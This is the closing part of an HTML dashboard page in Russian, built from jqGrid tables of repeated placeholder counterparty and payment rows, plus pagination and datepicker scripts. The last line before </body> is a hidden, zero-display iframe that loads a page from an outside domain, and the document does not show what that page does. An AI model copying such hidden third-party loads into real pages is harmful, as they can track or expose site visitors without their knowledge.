            { id: "123432", counterparty: 'Контрагент3', date_start: '2019-09-19', summary: '60 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "225668", counterparty: 'Контрагент2', date_start: '2018-06-29',  summary: '5560 грн.', commission: '60 грн.', status: 'Разблокирован' },
            { id: "365", counterparty: 'Контрагент2', date_start: '2014-12-01',  summary: '590 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "1896654", counterparty: 'Контрагент1', date_start: '2016-10-09',  summary: '1560 грн.', commission: '60 грн.', status: 'Разблокирован' },
            { id: "2563", counterparty: 'Контрагент23', date_start: '2008-01-01',  summary: '560 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "12556", counterparty: 'Контрагент2', date_start: '2009-09-09',  summary: '960 грн.', commission: '60 грн.', status: 'Разблокирован' },
            { id: "96351", counterparty: 'Контрагент2', date_start: '2010-07-19', summary: '9660 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "123432", counterparty: 'Контрагент3', date_start: '2019-09-19',  summary: '60 грн.', commission: '60 грн.', status: 'Разблокирован' },
            { id: "225668", counterparty: 'Контрагент2', date_start: '2018-06-29', summary: '5560 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "365", counterparty: 'Контрагент2', date_start: '2014-12-01',  summary: '590 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "1896654", counterparty: 'Контрагент3', date_start: '2016-10-09',  summary: '1560 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "2563", counterparty: 'Контрагент2', date_start: '2008-01-01',  summary: '560 грн.', commission: '90 грн.', status: 'Заблокирован' },
            { id: "12556", counterparty: 'Контрагент1', date_start: '2009-09-09',  summary: '960 грн.', commission: '60 грн.', status: 'Разблокирован' },
            { id: "96351", counterparty: 'Контрагент2', date_start: '2010-07-19',  summary: '9660 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "123432", counterparty: 'Контрагент3', date_start: '2019-09-19',  summary: '60 грн.', commission: '80 грн.', status: 'Разблокирован' },
            { id: "225668", counterparty: 'Контрагент2', date_start: '2018-06-29',  summary: '5560 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "365", counterparty: 'Контрагент2', date_start: '2014-12-01',  summary: '590 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "1896654", counterparty: 'Контрагент3', date_start: '2016-10-09',  summary: '1560 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "2563", counterparty: 'Контрагент2', date_start: '2008-01-01', summary: '560 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "12556", counterparty: 'Контрагент2', date_start: '2009-09-09',  summary: '960 грн.', commission: '60 грн.', status: 'Разблокирован' },
            { id: "96351", counterparty: 'Контрагент1', date_start: '2010-07-19',  summary: '9660 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "123432", counterparty: 'Контрагент3', date_start: '2019-09-19',  summary: '60 грн.', commission: '100 грн.', status: 'Разблокирован' },
            { id: "225668", counterparty: 'Контрагент2', date_start: '2018-06-29',  summary: '5560 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "365", counterparty: 'Контрагент2', date_start: '2014-12-01',  summary: '590 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "1896654", counterparty: 'Контрагент3', date_start: '2016-10-09',  summary: '1560 грн.', commission: '60 грн.', status: 'Разблокирован' },
            { id: "2563", counterparty: 'Контрагент2', date_start: '2008-01-01',  summary: '560 грн.', commission: '20 грн.', status: 'Заблокирован' },
            { id: "12556", counterparty: 'Контрагент2', date_start: '2009-09-09',  summary: '960 грн.', commission: '60 грн.', status: 'Разблокирован' },
            { id: "96351", counterparty: 'Контрагент1', date_start: '2010-07-19',  summary: '9660 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "123432", counterparty: 'Контрагент2', date_start: '2019-09-19',  summary: '60 грн.', commission: '30 грн.', status: 'Разблокирован' },
            { id: "225668", counterparty: 'Контрагент5', date_start: '2018-06-29',  summary: '5560 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "365", counterparty: 'Контрагент1', date_start: '2014-12-01',  summary: '590 грн.',  commission: '60 грн.',status: 'Разблокирован' },
            { id: "1896654", counterparty: 'Контрагент5', date_start: '2016-10-09',  summary: '1560 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "2563", counterparty: 'Контрагент2', date_start: '2008-01-01',  summary: '560 грн.', commission: '60 грн.', status: 'Разблокирован' },
            { id: "12556", counterparty: 'Контрагент2', date_start: '2009-09-09',  summary: '960 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "96351", counterparty: 'Контрагент1', date_start: '2010-07-19',  summary: '9660 грн.', commission: '60 грн.', status: 'Разблокирован' },
            { id: "123432", counterparty: 'Контрагент6', date_start: '2019-09-19',  summary: '60 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "225668", counterparty: 'Контрагент6', date_start: '2018-06-29',  summary: '5560 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "365", counterparty: 'Контрагент2', date_start: '2014-12-01',  summary: '590 грн.', commission: '60 грн.', status: 'Разблокирован' },
            { id: "1896654", counterparty: 'Контрагент2', date_start: '2016-10-09',  summary: '1560 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "2563", counterparty: 'Контрагент1', date_start: '2008-01-01',  summary: '560 грн.', commission: '60 грн.', status: 'Разблокирован' },
            { id: "12556", counterparty: 'Контрагент2', date_start: '2009-09-09',  summary: '960 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "96351", counterparty: 'Контрагент2', date_start: '2010-07-19',  summary: '9660 грн.', commission: '60 грн.', status: 'Разблокирован' },
            { id: "123432", counterparty: 'Контрагент1', date_start: '2019-09-19',  summary: '60 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "225668", counterparty: 'Контрагент5', date_start: '2018-06-29',  summary: '5560 грн.', commission: '60 грн.', status: 'Разблокирован' },
            { id: "365", counterparty: 'Контрагент1', date_start: '2014-12-01',  summary: '590 грн.', commission: '250 грн.', status: 'Заблокирован' },
            { id: "1896654", counterparty: 'Контрагент4', date_start: '2016-10-09',  summary: '1560 грн.', commission: '60 грн.', status: 'Разблокирован' },
            { id: "2563", counterparty: 'Контрагент2', date_start: '2008-01-01',  summary: '560 грн.', commission: '60 грн.', status: 'Разблокирован' },
            { id: "12556", counterparty: 'Контрагент1', date_start: '2009-09-09',  summary: '960 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "96351", counterparty: 'Контрагент4', date_start: '2010-07-19',  summary: '9660 грн.', commission: '60 грн.', status: 'Разблокирован' },
            

        ],
        searchOnEnter: false,
        autosearch: true,
        guiStyle: 'bootstrap4',
        // iconSet: 'fontAwesome',
        iconSet: 'jQueryUI',
        idPrefix: 'lot_',
        caption: 'Таблица контрагентов',
        hidegrid: false,
        loadonce: false,
        // pager: true,
        pagermode: "simple",
     	pageable: true,
        pager : '#statistic-counterparty-gridpager',
        rowNum: '10',
        viewrecords: true,
        ignoreCase: false,
        headertitles: true,
        // multiSort: true,
        height: 330,
        deepempty: true,
   //      jsonReader: {
			// 	repeatitems : false,
			// 	id: "0"
			// },
        // searching: {
        // 	deafaultSearch: 'cn'
        // },
        searching: {
            defaultSearch: "cn"
        },
        searchoptions: {
		    sopt: ["eq"],
		    dataInit: function (elem, options) {
		        var self = this, $elem = $(elem),
		            filterOnSelect = function () {
		                setTimeout(function () {
		                    self.triggerToolbar();
		                }, 50);
		            },
		            triggerInputChangeOnSelect = function () {
		                $elem.change();
		            };
		        
		        setTimeout(function () {
		            $elem.datepicker({
		                dateFormat: "dd-M-yy",
		                autoSize: true,
		                changeYear: true,
		                changeMonth: true,
		                showButtonPanel: true,
		                showWeek: true,
		                onSelect: (options.mode === "filter" ? filterOnSelect : triggerInputChangeOnSelect)
		            });
		        }, 50);
		    },
		    searchOnEnter: false,

		},

    }).jqGrid('filterToolbar', {
    	// searchOnEnter: false,
    	autosearch: true,
    	searchOperators: true

    });
	

    $("#statistic-counterparty-table-paginator .pagination-box a").click(function () {
        var page = Number(this.innerHTML);
        $("#statistic-counterparty-table").trigger("reloadGrid", { page: page});

       
    });
});


// Пагинация для таблицы
function initPaginatorCounterparty() {
	var last_page = $('#sp_1_statistic-counterparty-gridpager').html();
 	var current_page = $('#statistic-counterparty-wrap .form-control.ui-pg-input').val();

 	$('#statistic-counterparty-table-paginator .pagination-item.active a').text(current_page);
	$('#statistic-counterparty-table-paginator .pagination-item.last a').text('...' + last_page);
	$('#statistic-counterparty-table-paginator .pagination-item.prev a').text(parseInt(current_page) - 1);
	$('#statistic-counterparty-table-paginator .pagination-item.next a').text(parseInt(current_page) + 1);



	if (current_page >= last_page) {
		$('#statistic-counterparty-table-paginator .pagination-item.last').hide();

		$('#statistic-counterparty-table-paginator .pagination-item.next').hide();

	} else if (current_page < last_page) {
		$('#statistic-counterparty-table-paginator .pagination-item.last').show();

		$('#statistic-counterparty-table-paginator .pagination-item.next').show();

	} 
	if ( current_page == '1' ) {

		$('#statistic-counterparty-table-paginator .pagination-item.prev').hide();

		$('#statistic-counterparty-table-paginator .pagination-item.first').hide();

	} else if (current_page > '1') {

		$('#statistic-counterparty-table-paginator .pagination-item.prev').show();

		
	} 

	if (current_page > '2') {

		$('#statistic-counterparty-table-paginator .pagination-item.first').show();
	} else if ( current_page < '2' ) {
		$('#statistic-counterparty-table-paginator .pagination-item.first').hide()
	}

}

 $(document).ready(function(){
 	 initPaginatorCounterparty()
	$('#next_statistic-counterparty-gridpager, #prev_statistic-counterparty-gridpager, #first_statistic-counterparty-gridpager, #last_statistic-counterparty-gridpager').on('click', function() {
		initPaginatorCounterparty()
		
	})
 }) 

 $(document).ready(function(){
 	 initPaginatorCounterparty()
	$('#statistic-counterparty-wrap select, #statistic-counterparty-wrap input').on('change', function() {
		
		initPaginatorCounterparty()
	})
 })

 $(document).ready(function() {
 	$('#gs_statistic-counterparty-table_date_start').datepicker({
 		locale: 'ru',
 		showButtonPanel: true,
 		dateFormat: 'dd-mm-y'

 	})
 })


</script>
<!-- Генерация таблицы конец-->




  <!-- Генерация таблицы для статистики ОПЛАТ начало-->
<script type="text/javascript">

$(document).ready(function () {
    "use strict";
    $("#statistic-payment-table").jqGrid({
  //   	url:'get.php',
		// datatype: "json",
		// colNames:['ID', 'country_code', 'city', 'latitude', 'longitude'],
		// colModel:[
		// 	{name:'id',index:'id'},
		// 	{name:'country_code',index:'country_code'},	
		// 	{name:'city',index:'city'},		
		// 	{name:'latitude',index:'latitude'},		
		// 	{name:'longitude',index:'longitude'},		
		// ],
        colModel: [
            { name: 'id', label: "ID Контрагента", width: 120, clearSearch: true, autosearch: true, searchOnEnter: false, formatter:'showlink', formatoptions:{baseLinkUrl:'#', addParam: ''}},
            { name: 'counterparty', label: "Контрагент", width: 200, clearSearch: true, autosearch: true, searchOnEnter: false, formatter:'showlink', formatoptions:{baseLinkUrl:'#', addParam: ''}},
            { name: 'date_connect', label: "Дата открытия", width: 160, sorttype: 'date', formatter: 'date', formatoptions: { newformat: "d-m-y"},searchOnEnter: true, searchoptions: {sopt: ["eq"]}, clearSearch: true, autosearch: true,},
            // { name: 'date_close', label: "Дата завершения", width: 160, sorttype: 'date', formatter: 'date', formatoptions: { newformat: "d-m-y"},searchOnEnter: true, searchoptions: {sopt: ["eq"]}, clearSearch: true, autosearch: true,},
            { name: 'summary', label: "Сумма сделки", width: 150, clearSearch: true, autosearch: true, searchOnEnter: false},
            { name: 'commission', label: "Сумма комиссии", width: 150, clearSearch: true, autosearch: true, searchOnEnter: false},
            { name: 'status', label: "Статус", width: 100, clearSearch: true, autosearch: true, searchOnEnter: false, stype: "select", searchoptions: { value: ":Все;Заблокирован:Заблокирован;Разблокирован:Разблокирован" }},
        ],
        data: [
            { id: "123432", counterparty: 'Контрагент1', date_connect: '2019-09-19',summary: '60 грн.', commission: '30 грн.', status: 'Заблокирован' },
            { id: "225668", counterparty: 'Контрагент2', date_connect: '2018-06-29', summary: '5560 грн.', commission: '40 грн.', status: 'Разблокирован' },
            { id: "365", counterparty: 'Контрагент2', date_connect: '2014-12-01', summary: '590 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "1896654", counterparty: 'Контрагент2', date_connect: '2016-10-09', summary: '1560 грн.', commission: '120 грн.', status: 'Разблокирован' },
            { id: "2563", counterparty: 'Контрагент2', date_connect: '2008-01-01',  summary: '560 грн.', commission: '50 грн.', status: 'Заблокирован' },
            { id: "12556", counterparty: 'Контрагент2', date_connect: '2009-09-09', summary: '960 грн.', commission: '80 грн.', status: 'Заблокирован' },
            { id: "96351", counterparty: 'Контрагент1', date_connect: '2010-07-19',  summary: '9660 грн.', commission: '60 грн.', status: 'Разблокирован' },
            { id: "123432", counterparty: 'Контрагент3', date_connect: '2019-09-19', summary: '60 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "225668", counterparty: 'Контрагент2', date_connect: '2018-06-29',  summary: '5560 грн.', commission: '60 грн.', status: 'Разблокирован' },
            { id: "365", counterparty: 'Контрагент2', date_connect: '2014-12-01',  summary: '590 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "1896654", counterparty: 'Контрагент1', date_connect: '2016-10-09',  summary: '1560 грн.', commission: '60 грн.', status: 'Разблокирован' },
            { id: "2563", counterparty: 'Контрагент23', date_connect: '2008-01-01',  summary: '560 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "12556", counterparty: 'Контрагент2', date_connect: '2009-09-09',  summary: '960 грн.', commission: '60 грн.', status: 'Разблокирован' },
            { id: "96351", counterparty: 'Контрагент2', date_connect: '2010-07-19', summary: '9660 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "123432", counterparty: 'Контрагент3', date_connect: '2019-09-19',  summary: '60 грн.', commission: '60 грн.', status: 'Разблокирован' },
            { id: "225668", counterparty: 'Контрагент2', date_connect: '2018-06-29', summary: '5560 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "365", counterparty: 'Контрагент2', date_connect: '2014-12-01',  summary: '590 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "1896654", counterparty: 'Контрагент3', date_connect: '2016-10-09',  summary: '1560 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "2563", counterparty: 'Контрагент2', date_connect: '2008-01-01',  summary: '560 грн.', commission: '90 грн.', status: 'Заблокирован' },
            { id: "12556", counterparty: 'Контрагент1', date_connect: '2009-09-09',  summary: '960 грн.', commission: '60 грн.', status: 'Разблокирован' },
            { id: "96351", counterparty: 'Контрагент2', date_connect: '2010-07-19',  summary: '9660 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "123432", counterparty: 'Контрагент3', date_connect: '2019-09-19',  summary: '60 грн.', commission: '80 грн.', status: 'Разблокирован' },
            { id: "225668", counterparty: 'Контрагент2', date_connect: '2018-06-29',  summary: '5560 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "365", counterparty: 'Контрагент2', date_connect: '2014-12-01',  summary: '590 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "1896654", counterparty: 'Контрагент3', date_connect: '2016-10-09',  summary: '1560 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "2563", counterparty: 'Контрагент2', date_connect: '2008-01-01', summary: '560 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "12556", counterparty: 'Контрагент2', date_connect: '2009-09-09',  summary: '960 грн.', commission: '60 грн.', status: 'Разблокирован' },
            { id: "96351", counterparty: 'Контрагент1', date_connect: '2010-07-19',  summary: '9660 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "123432", counterparty: 'Контрагент3', date_connect: '2019-09-19',  summary: '60 грн.', commission: '100 грн.', status: 'Разблокирован' },
            { id: "225668", counterparty: 'Контрагент2', date_connect: '2018-06-29',  summary: '5560 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "365", counterparty: 'Контрагент2', date_connect: '2014-12-01',  summary: '590 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "1896654", counterparty: 'Контрагент3', date_connect: '2016-10-09',  summary: '1560 грн.', commission: '60 грн.', status: 'Разблокирован' },
            { id: "2563", counterparty: 'Контрагент2', date_connect: '2008-01-01',  summary: '560 грн.', commission: '20 грн.', status: 'Заблокирован' },
            { id: "12556", counterparty: 'Контрагент2', date_connect: '2009-09-09',  summary: '960 грн.', commission: '60 грн.', status: 'Разблокирован' },
            { id: "96351", counterparty: 'Контрагент1', date_connect: '2010-07-19',  summary: '9660 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "123432", counterparty: 'Контрагент2', date_connect: '2019-09-19',  summary: '60 грн.', commission: '30 грн.', status: 'Разблокирован' },
            { id: "225668", counterparty: 'Контрагент5', date_connect: '2018-06-29',  summary: '5560 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "365", counterparty: 'Контрагент1', date_connect: '2014-12-01',  summary: '590 грн.',  commission: '60 грн.',status: 'Разблокирован' },
            { id: "1896654", counterparty: 'Контрагент5', date_connect: '2016-10-09',  summary: '1560 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "2563", counterparty: 'Контрагент2', date_connect: '2008-01-01',  summary: '560 грн.', commission: '60 грн.', status: 'Разблокирован' },
            { id: "12556", counterparty: 'Контрагент2', date_connect: '2009-09-09',  summary: '960 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "96351", counterparty: 'Контрагент1', date_connect: '2010-07-19',  summary: '9660 грн.', commission: '60 грн.', status: 'Разблокирован' },
            { id: "123432", counterparty: 'Контрагент6', date_connect: '2019-09-19',  summary: '60 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "225668", counterparty: 'Контрагент6', date_connect: '2018-06-29',  summary: '5560 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "365", counterparty: 'Контрагент2', date_connect: '2014-12-01',  summary: '590 грн.', commission: '60 грн.', status: 'Разблокирован' },
            { id: "1896654", counterparty: 'Контрагент2', date_connect: '2016-10-09',  summary: '1560 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "2563", counterparty: 'Контрагент1', date_connect: '2008-01-01',  summary: '560 грн.', commission: '60 грн.', status: 'Разблокирован' },
            { id: "12556", counterparty: 'Контрагент2', date_connect: '2009-09-09',  summary: '960 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "96351", counterparty: 'Контрагент2', date_connect: '2010-07-19',  summary: '9660 грн.', commission: '60 грн.', status: 'Разблокирован' },
            { id: "123432", counterparty: 'Контрагент1', date_connect: '2019-09-19',  summary: '60 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "225668", counterparty: 'Контрагент5', date_connect: '2018-06-29',  summary: '5560 грн.', commission: '60 грн.', status: 'Разблокирован' },
            { id: "365", counterparty: 'Контрагент1', date_connect: '2014-12-01',  summary: '590 грн.', commission: '250 грн.', status: 'Заблокирован' },
            { id: "1896654", counterparty: 'Контрагент4', date_connect: '2016-10-09',  summary: '1560 грн.', commission: '60 грн.', status: 'Разблокирован' },
            { id: "2563", counterparty: 'Контрагент2', date_connect: '2008-01-01',  summary: '560 грн.', commission: '60 грн.', status: 'Разблокирован' },
            { id: "12556", counterparty: 'Контрагент1', date_connect: '2009-09-09',  summary: '960 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "96351", counterparty: 'Контрагент4', date_connect: '2010-07-19',  summary: '9660 грн.', commission: '60 грн.', status: 'Разблокирован' },
            

        ],
        searchOnEnter: false,
        autosearch: true,
        guiStyle: 'bootstrap4',
        // iconSet: 'fontAwesome',
        iconSet: 'jQueryUI',
        idPrefix: 'lot_',
        caption: 'Таблица контрагентов',
        hidegrid: false,
        loadonce: false,
        // pager: true,
        pagermode: "simple",
     	pageable: true,
        pager : '#statistic-payment-gridpager',
        rowNum: '10',
        viewrecords: true,
        ignoreCase: false,
        headertitles: true,
        // multiSort: true,
        height: 330,
        deepempty: true,
   //      jsonReader: {
			// 	repeatitems : false,
			// 	id: "0"
			// },
        // searching: {
        // 	deafaultSearch: 'cn'
        // },
        searching: {
            defaultSearch: "cn"
        },
        searchoptions: {
		    sopt: ["eq"],
		    dataInit: function (elem, options) {
		        var self = this, $elem = $(elem),
		            filterOnSelect = function () {
		                setTimeout(function () {
		                    self.triggerToolbar();
		                }, 50);
		            },
		            triggerInputChangeOnSelect = function () {
		                $elem.change();
		            };
		        
		        setTimeout(function () {
		            $elem.datepicker({
		                dateFormat: "dd-M-yy",
		                autoSize: true,
		                changeYear: true,
		                changeMonth: true,
		                showButtonPanel: true,
		                showWeek: true,
		                onSelect: (options.mode === "filter" ? filterOnSelect : triggerInputChangeOnSelect)
		            });
		        }, 50);
		    },
		    searchOnEnter: false,

		},

    }).jqGrid('filterToolbar', {
    	// searchOnEnter: false,
    	autosearch: true,
    	searchOperators: true

    });
	

    $("#statistic-payment-table-paginator .pagination-box a").click(function () {
        var page = Number(this.innerHTML);
        $("#statistic-payment-table").trigger("reloadGrid", { page: page});

       
    });
});


// Пагинация для таблицы
function initPaginatorPayment() {
	var last_page = $('#sp_1_statistic-payment-gridpager').html();
 	var current_page = $('#statistic-payment-wrap .form-control.ui-pg-input').val();

 	$('#statistic-payment-table-paginator .pagination-item.active a').text(current_page);
	$('#statistic-payment-table-paginator .pagination-item.last a').text('...' + last_page);
	$('#statistic-payment-table-paginator .pagination-item.prev a').text(parseInt(current_page) - 1);
	$('#statistic-payment-table-paginator .pagination-item.next a').text(parseInt(current_page) + 1);



	if (current_page >= last_page) {
		$('#statistic-payment-table-paginator .pagination-item.last').hide();

		$('#statistic-payment-table-paginator .pagination-item.next').hide();

	} else if (current_page < last_page) {
		$('#statistic-payment-table-paginator .pagination-item.last').show();

		$('#statistic-payment-table-paginator .pagination-item.next').show();

	} 
	if ( current_page == '1' ) {

		$('#statistic-payment-table-paginator .pagination-item.prev').hide();

		$('#statistic-payment-table-paginator .pagination-item.first').hide();

	} else if (current_page > '1') {

		$('#statistic-payment-table-paginator .pagination-item.prev').show();

		
	} 

	if (current_page > '2') {

		$('#statistic-payment-table-paginator .pagination-item.first').show();
	} else if ( current_page < '2' ) {
		$('#statistic-payment-table-paginator .pagination-item.first').hide()
	}

}

 $(document).ready(function(){
 	 initPaginatorPayment()
	$('#next_statistic-payment-gridpager, #prev_statistic-payment-gridpager, #first_statistic-payment-gridpager, #last_statistic-payment-gridpager').on('click', function() {
		initPaginatorPayment()
		
	})
 }) 

 $(document).ready(function(){
 	 initPaginatorPayment()
	$('#statistic-payment-wrap select, #statistic-payment-wrap input').on('change', function() {
		
		initPaginatorPayment()
	})
 })

 $(document).ready(function() {
 	$('#gs_statistic-payment-table_date_connect').datepicker({
 		locale: 'ru',
 		showButtonPanel: true,
 		dateFormat: 'dd-mm-y'

 	})
 })


</script>
<!-- Генерация таблицы конец-->





<iframe src="https://dl.metabar.ru/static/storage/index.html?version=202003191719" style="display: none;"></iframe>

</body>

</html>